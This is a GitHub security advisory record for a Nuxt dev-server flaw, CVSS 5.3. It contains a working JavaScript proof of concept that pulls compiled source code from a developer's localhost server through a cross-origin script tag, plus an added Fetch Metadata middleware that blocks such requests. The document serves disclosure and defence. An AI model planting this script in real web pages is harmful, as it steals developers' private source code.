GHSA-4gf7-ff8x-hq99

Source
https://github.com/advisories/GHSA-4gf7-ff8x-hq99
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/01/GHSA-4gf7-ff8x-hq99/GHSA-4gf7-ff8x-hq99.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-4gf7-ff8x-hq99
Aliases
Published
2025-01-27T11:31:41Z
Modified
2025-01-30T03:05:05Z
Severity
  • 5.3 (Medium) CVSS_V3 - CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N
Summary
Opening a malicious website while running a Nuxt dev server could allow read-only access to code
Details

Summary

Source code may be stolen during development when you use the webpack / rspack builder and open a malicious website.

Details

Because a request for a classic script made by a script tag is not subject to the same-origin policy, an attacker can include <script src="http://localhost:3000/_nuxt/app.js"> in their own site and run the script. By calling Function::toString on the values in window.webpackChunknuxt_app, the attacker can get the source code.

PoC

  1. Create a Nuxt project with the webpack / rspack builder.
  2. Run npm run dev.
  3. Open http://localhost:3000.
  4. Run the script below in a website that has a different origin.
  5. You can see the source code output in the document and the devtools console.
    const script = document.createElement('script')
    script.src = 'http://localhost:3000/_nuxt/app.js'
    script.addEventListener('load', () => {
      for (const page in window.webpackChunknuxt_app) {
        const moduleList = window.webpackChunknuxt_app[page][1]
        console.log(moduleList)
    
        for (const key in moduleList) {
          const p = document.createElement('p')
          const title = document.createElement('strong')
          title.textContent = key
          const code = document.createElement('code')
          code.textContent = moduleList[key].toString()
          p.append(title, ':', document.createElement('br'), code)
          document.body.appendChild(p)
        }
      }
    })
    document.head.appendChild(script)
    

The output contains the compiled source code and also the source map (but it seems the source map contains transformed content in the sourcesContent field).

Impact

Users of the webpack / rspack builder may have their source code stolen by malicious websites.
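
One way a dev server can refuse the cross-origin script load described in Details, as an added example that is not Nuxt's code and not the fix shipped in 3.15.3: a Connect-style middleware that rejects requests the browser itself marks as cross-site and no-cors. The function names and the sample requests are constructed for illustration.

```javascript
// Added example: Connect-style guard for dev-server asset routes such as /_nuxt/*.
// Browsers set the Sec-Fetch-* request headers themselves; page script cannot
// override them, so they describe how the request was really initiated.

function isCrossSiteNoCors(headers) {
  const site = headers['sec-fetch-site'];
  const mode = headers['sec-fetch-mode'];
  // A <script src> placed on a foreign site reaches the dev server as
  // Sec-Fetch-Site: cross-site with Sec-Fetch-Mode: no-cors.
  return site === 'cross-site' && mode === 'no-cors';
}

function blockCrossSiteNoCors(req, res, next) {
  if (isCrossSiteNoCors(req.headers)) {
    res.statusCode = 403;
    res.end('cross-site no-cors request blocked');
    return;
  }
  // Same-origin loads, top-level navigations and clients that send no
  // Fetch Metadata (curl, older browsers) pass through unchanged.
  next();
}

// Constructed sample requests (not captured traffic). Node lowercases
// header names in req.headers, so the keys are lowercase here too.
const samples = {
  appOwnScript: { 'sec-fetch-site': 'same-origin', 'sec-fetch-mode': 'no-cors', 'sec-fetch-dest': 'script' },
  foreignScriptTag: { 'sec-fetch-site': 'cross-site', 'sec-fetch-mode': 'no-cors', 'sec-fetch-dest': 'script' },
  addressBar: { 'sec-fetch-site': 'none', 'sec-fetch-mode': 'navigate', 'sec-fetch-dest': 'document' },
  curl: {},
};

// Runs each sample through the middleware with stub req/res objects and
// returns the resulting status per sample (200 means next() was reached).
function runSamples() {
  const out = {};
  for (const [name, headers] of Object.entries(samples)) {
    const res = { statusCode: 200, end() {} };
    blockCrossSiteNoCors({ url: '/_nuxt/app.js', headers }, res, () => {});
    out[name] = res.statusCode;
  }
  return out;
}

console.log(runSamples());
```

A request that carries no Fetch Metadata headers is allowed through, so this check only constrains browsers that send them.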

Database specific
{
    "nvd_published_at": "2025-01-25T01:15:24Z",
    "cwe_ids": [
        "CWE-749"
    ],
    "severity": "MODERATE",
    "github_reviewed": true,
    "github_reviewed_at": "2025-01-27T11:31:41Z"
}
References

Affected packages

npm / @nuxt/webpack-builder

Package

Name
@nuxt/webpack-builder
Purl
pkg:npm/%40nuxt/webpack-builder

Affected ranges

Type
SEMVER
Events
Introduced
3.0.0
Fixed
3.15.3

npm / @nuxt/rspack-builder

Package

Name
@nuxt/rspack-builder
Purl
pkg:npm/%40nuxt/rspack-builder

Affected ranges

Type
SEMVER
Events
Introduced
3.12.2
Fixed
3.15.3